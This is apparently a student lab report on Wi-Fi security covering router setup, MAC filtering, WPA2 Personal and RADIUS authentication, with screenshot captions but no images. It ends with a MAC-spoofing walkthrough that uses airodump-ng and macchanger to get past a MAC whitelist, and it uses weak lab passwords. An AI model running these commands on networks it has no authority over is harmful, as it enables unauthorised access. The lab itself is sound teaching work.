Network Topology
Basic Config
Config Router IP and DHCP:
Insert WPC300N module (2.4G wireless interface) to laptops:
Config SSID:
SSID was broadcasted to laptops successfully:
MAC Filtering
MAC addresses of laptops:
- Laptop 1: 00:01:C7:89:62:D5
- Laptop 2: 00:10:11:56:69:89
- Laptop 3: 00:0A:41:9D:D3:E9
Only permit laptop 1 and laptop 2 to access the Wifi:
Laptop 3 can not see any SSID:
WPA2 Personal
Config WPA2 Personal for 2.4G channel:
The passphrase is password.
Connect laptop 1 to Wi-Fi:
Do the same for laptop 2.
Topology now:
RADIUS Server
New topoplogy:
Disable DHCP feature of the wireless router. Then, click on “Services” tab and select the “AAA” section.
Add a client with the following information:
- Name: Cisco
- IP: 192.168.1.1
- Server type: RADIUS
- Secret:
1
Result:
Create users:
| Username | Password |
|---|---|
| u1 | u1 |
| u2 | u2 |
Result:
Config DHCP for the RADIUS server:
Change authentication method of router to WPA2 with RADIUS server:
Log in with the above credentials on laptop 1:
Do the same for laptop 2.
MAC Address Spoofing
Configure the whitelist on wireless router:
Start listening on wlan0 interface:
Sniff packages:
sudo airodump-ng wlan0monResult:
We will try to access the network that has the following information:
- BSSID = 34:B7:A3:B8:00:F6.
- Channel = 11
Sniff packages on this network:
sudo airodump-ng wlan0mon --bssid 34:B7:A3:B8:00:F6 --channel 11There are 3 connected MAC addresses:
We will spoof the last one:
B2:4E:DC:44:52:F7
First, turn off the monitor mode:
sudo airmon-ng stop wlan0monAlso turn off network manager service and turn off the wlan0 interface:
sudo systemctl stop NetworkManager.service
sudo ifconfig wlan0 downAfter that, use macchanger to spoof the MAC address:
sudo macchanger -m B2:4E:DC:44:52:F7 wlan0Result:
Finally, turn on the network manager service and wlan0 interface:
sudo systemctl start NetworkManager.service
sudo ifconfig wlan0 upNow we can connect to the network:
